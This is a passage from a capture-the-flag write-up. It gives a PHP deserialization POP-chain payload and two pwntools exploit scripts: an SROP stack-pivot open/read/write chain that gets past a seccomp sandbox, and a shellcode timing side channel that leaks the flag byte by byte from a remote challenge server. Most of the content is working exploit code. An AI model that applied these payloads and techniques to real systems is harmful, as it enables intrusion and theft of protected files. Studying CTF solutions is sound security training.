$l->ll2 = $t2;
$t = new To;
$t->tt2 = $l;
$g = new Good;
$g->g1 = $t;
$r = new Luck;
$r->lll3 = $g;
$q = new You;
$q->y1 = $r;
// Private properties serialize with the "\0Class\0name" prefix, hence the
// urlencode (the %00 sequences in the payload below).
echo urlencode(serialize($q));

payload

D0g3=O%3A3%3A%22You%22%3A1%3A%7Bs%3A2%3A%22y1%22%3BO%3A4%3A%22Luck%22%3A4%3A%7Bs%3A2%3A%22l1%22%3BN%3Bs%3A3%3A%22ll2%22%3BN%3Bs%3A9%3A%22%00Luck%00md5%22%3Bi%3A1131911%3Bs%3A4%3A%22lll3%22%3BO%3A4%3A%22Good%22%3A2%3A%7Bs%3A2%3A%22g1%22%3BO%3A2%3A%22To%22%3A3%3A%7Bs%3A2%3A%22t1%22%3BN%3Bs%3A3%3A%22tt2%22%3BO%3A4%3A%22Luck%22%3A4%3A%7Bs%3A2%3A%22l1%22%3BN%3Bs%3A3%3A%22ll2%22%3BO%3A2%3A%22To%22%3A3%3A%7Bs%3A2%3A%22t1%22%3BO%3A4%3A%22Luck%22%3A4%3A%7Bs%3A2%3A%22l1%22%3BO%3A4%3A%22Flag%22%3A2%3A%7Bs%3A13%3A%22SplFileObject%22%3Bs%3A20%3A%22%2FFfffLlllLaAaaggGgGg%22%3Bs%3A1%3A%22b%22%3Bs%3A0%3A%22%22%3B%7Ds%3A3%3A%22ll2%22%3BN%3Bs%3A9%3A%22%00Luck%00md5%22%3Bi%3A1131911%3Bs%3A4%3A%22lll3%22%3BN%3B%7Ds%3A3%3A%22tt2%22%3BN%3Bs%3A4%3A%22arg1%22%3Ba%3A1%3A%7Bs%3A7%3A%22guangji%22%3Bi%3A1%3B%7D%7Ds%3A9%3A%22%00Luck%00md5%22%3Bi%3A1131911%3Bs%3A4%3A%22lll3%22%3BN%3B%7Ds%3A4%3A%22arg1%22%3Ba%3A1%3A%7Bs%3A7%3A%22guangji%22%3Bi%3A1%3B%7D%7Ds%3A9%3A%22%00Good%00gg2%22%3Bs%3A2%3A%22%2A%26%22%3B%7D%7D%7D

PWN

seccomp

图片
图片

一个输入长gadget的全局变量,一次溢出机会

图片
图片

有沙箱,但是可以orw读出flag,借助一部分srop的手法加以利用

from pwn import *
import time
import subprocess

# pwntools script from the writeup for the "seccomp" task.
context(arch='amd64',os='linux',log_level='debug')
command = "ls -l"  # unused below
#p = process('./chall')
p=remote("47.108.206.43",22039)
elf = ELF("./chall")
#libc = ELF("./libc-2.23.so")
#libc = ELF("./libc.so.6")
#context(arch="amd64",os="linux",log_level="debug")

# Short aliases around the pwntools tube; only sla() is used in this script.
def s(a) : p.send(a)
def sa(a, b) : p.sendafter(a, b)
def sl(a) : p.sendline(a)
def sla(a, b) : p.sendlineafter(a, b)
def r() : return p.recv()
def pr() : print(p.recv())
def rl(a) : return p.recvuntil(a)
def inter() : p.interactive()
def get_addr():
  return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))

#752
# Addresses in the binary as given by the writeup author (not verified here).
leave = 0x40136c
sig = 0x0000000000401194
sy = 0x000000000040118a
#gdb.attach(p)

# Three SigreturnFrame objects, placed one after another in the global
# buffer; the variable names give the call each one is meant for (the
# open / read / write chain mentioned in the note above).
opena = SigreturnFrame()
opena.rax = 0
opena.rdi = 2
opena.rsi = 0x404060
opena.rdx = 0
opena.rcx = 0
opena.rip = elf.plt['syscall']
opena.rbp = 0x404060 + 0x20
opena.rsp = 0x404170
read1 = SigreturnFrame()
read1.rax = 0
read1.rdi = 0
read1.rsi = 3
read1.rdx = 0x404560
read1.rcx = 0x30
read1.rip = elf.plt['syscall']
read1.rbp = 0x404060 + 0x20
read1.rsp = 0x404170+(0x404170-0x404060)-8
write = SigreturnFrame()
write.rax = 0
write.rdi = 1
write.rsi = 1
write.rdx = 0x404560
write.rcx = 0x30
write.rip = elf.plt['syscall']
write.rbp = 0x404060 + 0x20
write.rsp = 0x404170+(0x404170-0x404060)
# First input: the "./flag" path followed by the gadget/frame chain, stored
# in the global buffer at 0x404060.
sla("easyhack",b'./flag\x00\x00'+p64(sig)+p64(sy)+flat(opena)+p64(sig)+p64(sy)+flat(read1)+p64(sig)+p64(sy)+flat(write))
# Second input: the single overflow; rbp is set to the buffer and `leave`
# moves execution into it.
sla("SUID?",b'a'*(0x2a)+p64(0x404060)+p64(leave))
p.interactive()

side_channel,initiate!

from pwn import *
# pwntools script from the writeup for the "side_channel" task; `time`,
# `args`, `remote`, `process` and `shellcraft` all come in via `from pwn import *`.
context.log_level = 'ERROR'
context.terminal = ['wt.exe', 'wsl.exe', 'bash', '-c']
context.binary = './chall'
binary = context.binary  # unused below

REMOTE = args.REMOTE or 1  # default remote; pass REMOTE=0 to use the local binary

syscall = 0x40118A
bss = 0x404060
FLAG = '/flag'

# Shellcode: open the flag and read 0x100 bytes of it to bss+0xE00, then read
# two bytes (index, guess) from stdin into 0x404F60 and compare the guess with
# flag[index]. L_HANG does one more blocking read before exiting, L_EXIT
# exits at once; test() below distinguishes the two by timing.
code = shellcraft.open(FLAG, 'O_RDONLY', 'rdx')
code += shellcraft.read(3, bss+0xE00, 0x100)
code += '''
    xor eax, eax
    mov rdi, 0
    mov rsi, 0x404F60
    mov rdx, 2
    syscall

    movzx rcx, byte ptr [0x404F60]
    movzx rax, byte ptr [0x404F61]
    movzx rbx, byte ptr [0x404E60+rcx]
    cmp rax, rbx
    jge L_HANG
    jmp L_EXIT
L_HANG:
    xor eax, eax
    mov rdi, 0
    mov rsi, 0x404F60
    mov rdx, 1
    syscall
L_EXIT:
'''
code += shellcraft.exit(0)

shellcode = asm(code)
def test(idx, ch):
    """Probe one (index, guess) pair against a fresh target instance.

    Returns True when the target stayed busy past the 0.28 s threshold, i.e.
    the shellcode took the L_HANG branch: by the `cmp rax, rbx; jge` above
    that means ch >= flag[idx].
    """
    if REMOTE:
        p = remote('47.108.206.43', 37910)
    else:
        p = process('./chall')

    # First input: shellcode padded to 0x100, then the saved-rbp slot and the
    # two addresses that lead into the syscall stub.
    pay1 = shellcode
    pay1 = pay1.ljust(0x100, b'A')
    pay1 += b'A'*0x8
    pay1 += p64(0x401193)
    pay1 += p64(syscall)

    # sigreturn frame: mprotect(0x404000, 0x1000, 7) — the page holding the
    # shellcode becomes executable — then continue at 0x401186 with rsp in bss.
    frame = SigreturnFrame()
    frame.rax = constants.SYS_mprotect
    frame.rdi = 0x404000
    frame.rsi = 0x1000
    frame.rdx = 7
    frame.rsp = bss+0x210
    frame.rip = 0x401186
    pay1 += bytes(frame)
    pay1 += p64(0x404060)

    # gdb.attach(p, 'b *0x40118E')
    # sleep(1)

    p.sendafter(b"easyhack\n", pay1)
    p.recvline()
    # Second input: the overflow; 0x401441 is a leave;ret per the original comment.
    payload = b'A'*0x2A
    payload += p64(bss+0x100)
    payload += p64(0x401441) # level; ret
    p.send(payload)
    p.send(p8(idx)+bytes([ch]))  # the two bytes the shellcode reads into 0x404F60

    # clean() drains output for up to 0.3 s; a target stuck in L_HANG runs
    # the full timeout, a target that exited returns early.
    t = time.time()
    p.clean(0.3)
    t = time.time()-t
    p.close()
    print(t)
    return t > 0.28

# Binary search each of the 36 flag characters over the byte range
# 0x2D..0x66 ('-'..'f'): a stall means ch >= flag[i], so the search settles
# on the smallest such ch, i.e. the character itself. Seeding `flag` with an
# already-recovered prefix resumes from there.
flag = ""
for i in range(len(flag), 36):
    l = 0x2D
    r = 0x66
    while l < r:
        mid = (l+r)//2
        res = test(i, mid)
        if res:
            r = mid
        else:
            l = mid+1
        print(l, r, chr(l), chr(r))
    flag += chr(l)
    print(flag)

print('flag{'+flag+'}')